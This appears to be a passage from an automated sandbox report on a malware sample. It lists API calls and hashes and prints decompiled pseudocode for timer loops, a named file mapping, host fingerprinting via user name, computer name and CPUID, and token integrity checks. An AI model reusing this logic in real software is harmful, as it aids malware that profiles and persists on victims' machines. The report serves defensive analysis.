                                          0x06771859
                                          0x0677185b
                                          0x06771860
                                          0x06771a2f
                                          0x06771a39
                                          0x06771a42
                                          0x06771866
                                          0x06771872
                                          0x06771878
                                          0x0677187d
                                          0x06771a23
                                          0x06771a2d
                                          0x00000000
                                          0x06771a2d
                                          0x06771889
                                          0x0677188e
                                          0x06771897
                                          0x067718a8
                                          0x067718ac
                                          0x067718b5
                                          0x067718bb
                                          0x067718ca
                                          0x067718d1
                                          0x067718da
                                          0x067718e0
                                          0x06771a17
                                          0x06771a21
                                          0x00000000
                                          0x06771a21
                                          0x067718ec
                                          0x067718f2
                                          0x067718f7
                                          0x067718f8
                                          0x067718ff
                                          0x06771904
                                          0x06771909
                                          0x06771a0d
                                          0x06771a15
                                          0x00000000
                                          0x06771a15
                                          0x06771912
                                          0x06771919
                                          0x06771921
                                          0x06771926
                                          0x0677192f
                                          0x06771935
                                          0x0677193c
                                          0x06771941
                                          0x06771946
                                          0x06771a45
                                          0x067719f9
                                          0x067719f9
                                          0x067719fe
                                          0x06771a09
                                          0x06771a0b
                                          0x00000000
                                          0x06771a0b
                                          0x06771950
                                          0x06771955
                                          0x0677195a
                                          0x0677195f
                                          0x0677196a
                                          0x0677196f
                                          0x06771972
                                          0x06771978
                                          0x0677197e
                                          0x06771984
                                          0x06771987
                                          0x0677198d
                                          0x06771990
                                          0x06771995
                                          0x06771999
                                          0x06771999
                                          0x067719a5
                                          0x067719b1
                                          0x067719b5
                                          0x067719b7
                                          0x067719bc
                                          0x067719be
                                          0x067719c3
                                          0x067719c8
                                          0x067719d5
                                          0x067719dd
                                          0x067719e0
                                          0x067719e0
                                          0x067719bc
                                          0x00000000
                                          0x067719a7
                                          0x067719ab
                                          0x067719e2
                                          0x067719e5
                                          0x067719ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x067719ee
                                          0x067719ad
                                          0x00000000
                                          0x067719ad
                                          0x067719a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 06771768
                                          • wsprintfA.USER32 ref: 067717B8
                                          • wsprintfA.USER32 ref: 067717D5
                                          • wsprintfA.USER32 ref: 06771801
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771813
                                          • wsprintfA.USER32 ref: 06771834
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 06771872
                                          • GetTickCount.KERNEL32 ref: 06771883
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 06771897
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 067718B5
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?,06C495B0), ref: 06774D57
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(?,?,?,067752FE,?,06C495B0), ref: 06774D5F
                                            • Part of subcall function 06774D2C: strcpy.NTDLL ref: 06774D76
                                            • Part of subcall function 06774D2C: lstrcat.KERNEL32(00000000,?), ref: 06774D81
                                            • Part of subcall function 06774D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,067752FE,?,06C495B0), ref: 06774D9E
                                          • StrTrimA.SHLWAPI(00000000,0677C294,?,06C495B0), ref: 067718EC
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?,00000000,00000000,06775335,616D692F,00000000), ref: 06779DFB
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?), ref: 06779E03
                                            • Part of subcall function 06779DEF: lstrcpy.KERNEL32(00000000,?), ref: 06779E1A
                                            • Part of subcall function 06779DEF: lstrcat.KERNEL32(00000000,?), ref: 06779E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 06771919
                                          • lstrcpy.KERNEL32(?,?), ref: 06771921
                                          • lstrcat.KERNEL32(?,?), ref: 0677192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 06771935
                                            • Part of subcall function 0677A5E9: lstrlen.KERNEL32(?,00000000,0677D330,00000001,0677937A,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?), ref: 0677A5F2
                                            • Part of subcall function 0677A5E9: mbstowcs.NTDLL ref: 0677A619
                                            • Part of subcall function 0677A5E9: memset.NTDLL ref: 0677A62B
                                          • wcstombs.NTDLL ref: 067719C8
                                            • Part of subcall function 0677A060: SysAllocString.OLEAUT32(?), ref: 0677A09B
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 06771A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 06771A15
                                          • HeapFree.KERNEL32(00000000,?,?,06C495B0), ref: 06771A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771A2D
                                          • HeapFree.KERNEL32(00000000,?), ref: 06771A39
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 3748877296-0
                                          • Opcode ID: 473e87bd33a833c9381f8b751102ffb74c40c4c4da91bd57d0906f1e915755de
                                          • Instruction ID: cac325807f9eee4e69da1eeaa8dd67e55918ed5454b8e1411f00926db589a6e6
                                          • Opcode Fuzzy Hash: 473e87bd33a833c9381f8b751102ffb74c40c4c4da91bd57d0906f1e915755de
                                          • Instruction Fuzzy Hash: A9910971900209EFDF61DFA4DC88EAE7BBAEF48210F158464FA08E7264DB31D951DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06779B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 6779b6f-6779ba1 memset CreateWaitableTimerA 98 6779ba7-6779c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 6779d23-6779d29 GetLastError 97->99 101 6779c06-6779c09 98->101 102 6779c8b-6779c91 98->102 100 6779d2d-6779d37 99->100 103 6779c14 101->103 104 6779c0b call 67768cf 101->104 105 6779c92-6779c96 102->105 109 6779c1e 103->109 110 6779c10-6779c12 104->110 107 6779ca6-6779caa 105->107 108 6779c98-6779ca0 HeapFree 105->108 107->105 111 6779cac-6779cb6 CloseHandle 107->111 108->107 112 6779c22-6779c27 109->112 110->103 110->109 111->100 113 6779c3a-6779c5d call 6779f11 112->113 114 6779c29-6779c30 112->114 117 6779c62-6779c68 113->117 114->113 115 6779c32 114->115 115->113 118 6779c6a-6779c75 117->118 119 6779cb8-6779cbd 117->119 118->112 122 6779c77-6779c87 call 67754ac 118->122 120 6779cbf-6779cc5 119->120 121 6779cdc-6779ce4 119->121 120->102 123 6779cc7-6779cda call 6776106 120->123 124 6779cea-6779d18 _allmul SetWaitableTimer WaitForMultipleObjects 121->124 122->102 123->124 124->112 127 6779d1e 124->127 127->102
                                          C-Code - Quality: 83%
                                          			E06779B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x677d240);
					_v76 = 0;
					_v80 = 0;
					L0677B088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x677d26c; // 0x3d0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x677d24c = 5;
						} else {
							_t68 = E067768CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x677d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E06779F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E067754AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x677d244);
							goto L21;
						} else {
							__eflags =  *0x677d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E06776106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x677d248);
								L21:
								L0677B088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x677d238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x06779b6f
                                          0x06779b85
                                          0x06779b89
                                          0x06779b8e
                                          0x06779b95
                                          0x06779b9b
                                          0x06779ba1
                                          0x06779d29
                                          0x06779ba7
                                          0x06779ba7
                                          0x06779ba9
                                          0x06779bae
                                          0x06779baf
                                          0x06779bb5
                                          0x06779bb9
                                          0x06779bbd
                                          0x06779bcb
                                          0x06779bd9
                                          0x06779bdd
                                          0x06779bdf
                                          0x06779bec
                                          0x06779bf8
                                          0x06779bfa
                                          0x06779c00
                                          0x06779c09
                                          0x06779c14
                                          0x06779c14
                                          0x06779c0b
                                          0x06779c0b
                                          0x06779c12
                                          0x00000000
                                          0x00000000
                                          0x06779c12
                                          0x06779c1e
                                          0x00000000
                                          0x06779c22
                                          0x06779c27
                                          0x06779c32
                                          0x06779c32
                                          0x06779c3a
                                          0x06779c45
                                          0x06779c4d
                                          0x06779c56
                                          0x06779c59
                                          0x06779c5d
                                          0x06779c62
                                          0x06779c68
                                          0x00000000
                                          0x00000000
                                          0x06779c6a
                                          0x06779c6e
                                          0x06779c72
                                          0x06779c75
                                          0x00000000
                                          0x06779c77
                                          0x06779c87
                                          0x06779c87
                                          0x00000000
                                          0x06779cb8
                                          0x06779cb8
                                          0x06779cbd
                                          0x06779cdc
                                          0x06779cde
                                          0x06779ce3
                                          0x06779ce4
                                          0x00000000
                                          0x06779cbf
                                          0x06779cbf
                                          0x06779cc5
                                          0x00000000
                                          0x06779cc7
                                          0x06779cc7
                                          0x06779ccc
                                          0x06779cce
                                          0x06779cd3
                                          0x06779cd4
                                          0x06779cea
                                          0x06779cea
                                          0x06779cf2
                                          0x06779d00
                                          0x06779d04
                                          0x06779d10
                                          0x06779d12
                                          0x06779d16
                                          0x06779d18
                                          0x00000000
                                          0x06779d1e
                                          0x00000000
                                          0x06779d1e
                                          0x06779d18
                                          0x06779cc5
                                          0x00000000
                                          0x06779cbd
                                          0x06779c8b
                                          0x06779c8d
                                          0x06779c91
                                          0x06779c92
                                          0x06779c92
                                          0x06779c96
                                          0x06779ca0
                                          0x06779ca0
                                          0x06779ca6
                                          0x06779ca9
                                          0x06779ca9
                                          0x06779cb0
                                          0x06779cb0
                                          0x06779d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 06779B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 06779B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06779BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 06779BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,06774AC4,?), ref: 06779BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,06774AC4,?,00000000), ref: 06779CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,06774AC4,?,00000000,?,?), ref: 06779CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 06779CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 06779D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 06779D10
                                            • Part of subcall function 067768CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06C49388,00000000,?,7519F710,00000000,7519F730), ref: 0677691E
                                            • Part of subcall function 067768CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06C493C0,?,00000000,30314549,00000014,004F0053,06C4937C), ref: 067769BB
                                            • Part of subcall function 067768CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,06779C10), ref: 067769CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,06774AC4,?,00000000,?,?), ref: 06779D23
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 6e086f06c207aa6e1ff8578858366404097f07f42c612fe7806c983b6443c744
                                          • Instruction ID: 407522aad560063769ab4c1c140a7c9359739ea2de367b7249b6bf55e7f517bc
                                          • Opcode Fuzzy Hash: 6e086f06c207aa6e1ff8578858366404097f07f42c612fe7806c983b6443c744
                                          • Instruction Fuzzy Hash: 6A51ADB1419310AFCBA1EF25DC48DABBBE9EF89724F108A19FAA4D2154D770C504CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06771A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E06771A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0677B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x677d2a4; // 0x4ca5a8
				_t5 = _t13 + 0x677e836; // 0x6c48dde
				_t6 = _t13 + 0x677e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0677AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x677d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x06771a4e
                                          0x06771a56
                                          0x06771a5a
                                          0x06771a60
                                          0x06771a65
                                          0x06771a6a
                                          0x06771a6d
                                          0x06771a70
                                          0x06771a75
                                          0x06771a76
                                          0x06771a79
                                          0x06771a7e
                                          0x06771a85
                                          0x06771a8f
                                          0x06771a91
                                          0x06771a92
                                          0x06771a95
                                          0x06771ab1
                                          0x06771ab7
                                          0x06771abb
                                          0x06771b09
                                          0x06771abd
                                          0x06771aca
                                          0x06771ada
                                          0x06771ae2
                                          0x06771af4
                                          0x06771af8
                                          0x00000000
                                          0x00000000
                                          0x06771ae4
                                          0x06771ae7
                                          0x06771aec
                                          0x06771aee
                                          0x06771aee
                                          0x06771acc
                                          0x06771ace
                                          0x06771afa
                                          0x06771afb
                                          0x06771afb
                                          0x06771aca
                                          0x06771b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53,?,?), ref: 06771A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 06771A70
                                          • _snwprintf.NTDLL ref: 06771A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,0677D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 06771AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53,?), ref: 06771AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 06771ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53), ref: 06771AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,06774996,?,?,4D283A53,?), ref: 06771B03
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 2e84810082474fa6817327a1eb015f6cb853311277e886f6e9ebd1adc78476c6
                                          • Instruction ID: 01d09e4d91af4f88673091fd89ac76e96823680b026179c3c408e6ca9749cd44
                                          • Opcode Fuzzy Hash: 2e84810082474fa6817327a1eb015f6cb853311277e886f6e9ebd1adc78476c6
                                          • Instruction Fuzzy Hash: 6621F3B2600204BFDB62EF68DD45F9D77AAAF48710F258121F705EB290E770DA05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067793D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 67793d5-67793e9 140 67793f3-6779405 call 6776f89 139->140 141 67793eb-67793f0 139->141 144 6779407-6779417 GetUserNameW 140->144 145 6779459-6779466 140->145 141->140 146 6779468-677947f GetComputerNameW 144->146 147 6779419-6779429 RtlAllocateHeap 144->147 145->146 148 6779481-6779492 RtlAllocateHeap 146->148 149 67794bd-67794e1 146->149 147->146 150 677942b-6779438 GetUserNameW 147->150 148->149 151 6779494-677949d GetComputerNameW 148->151 152 677943a-6779446 call 6777cf7 150->152 153 6779448-6779457 HeapFree 150->153 154 677949f-67794ab call 6777cf7 151->154 155 67794ae-67794b7 HeapFree 151->155 152->153 153->146 154->155 155->149
                                          C-Code - Quality: 96%
                                          			E067793D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x677d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E06776F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x677d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x677d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E06777CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x677d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x677d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E06777CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x677d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x067793d5
                                          0x067793dd
                                          0x067793e1
                                          0x067793e4
                                          0x067793e9
                                          0x067793eb
                                          0x067793f0
                                          0x067793f0
                                          0x067793f6
                                          0x067793f8
                                          0x06779405
                                          0x06779466
                                          0x06779407
                                          0x0677940c
                                          0x06779412
                                          0x06779417
                                          0x06779425
                                          0x06779429
                                          0x06779438
                                          0x0677943f
                                          0x06779446
                                          0x06779446
                                          0x06779451
                                          0x06779451
                                          0x06779429
                                          0x06779417
                                          0x06779468
                                          0x0677946e
                                          0x06779478
                                          0x0677947a
                                          0x0677947f
                                          0x0677948e
                                          0x06779492
                                          0x0677949d
                                          0x067794a4
                                          0x067794ab
                                          0x067794ab
                                          0x067794b7
                                          0x067794b7
                                          0x06779492
                                          0x067794c2
                                          0x067794c4
                                          0x067794c7
                                          0x067794c9
                                          0x067794cc
                                          0x067794cf
                                          0x067794d9
                                          0x067794dd
                                          0x067794e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0677940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06779423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 06779430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06779451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 06779478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0677948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 06779499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 067794B7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 9cade3999f5154c2f982ac01a594c853d98ba6b99e284914e39fb42f7a99b6a3
                                          • Instruction ID: e9debc2b54d2fda3843d464b9c8bdcd49080d02d22ae3fe784c3aa98f1127ad2
                                          • Opcode Fuzzy Hash: 9cade3999f5154c2f982ac01a594c853d98ba6b99e284914e39fb42f7a99b6a3
                                          • Instruction Fuzzy Hash: 12313CB1A00205EFDB61DFA9DC81A6FB7FAFF48200F518469E614D7214DB30EA01DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067753E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E067753E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x677d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E067758BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0677147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x067753f0
                                          0x067753f7
                                          0x067753fe
                                          0x06775412
                                          0x0677541d
                                          0x06775435
                                          0x06775442
                                          0x06775445
                                          0x0677544a
                                          0x06775455
                                          0x06775459
                                          0x06775468
                                          0x0677546c
                                          0x06775488
                                          0x06775488
                                          0x0677548c
                                          0x0677548c
                                          0x06775491
                                          0x06775495
                                          0x0677549b
                                          0x0677549c
                                          0x067754a3
                                          0x067754a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 06775415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 06775435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 06775445
                                          • CloseHandle.KERNEL32(00000000), ref: 06775495
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 06775468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 06775470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 06775480
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 8cd2553d70760a2e9830c6eb2afa413e7317e821a19541fd34cff2b8c9133174
                                          • Instruction ID: f4e7e2931b78eadd04a9b91a70e11c817752a97c31aa795ff511d729629ffb8b
                                          • Opcode Fuzzy Hash: 8cd2553d70760a2e9830c6eb2afa413e7317e821a19541fd34cff2b8c9133174
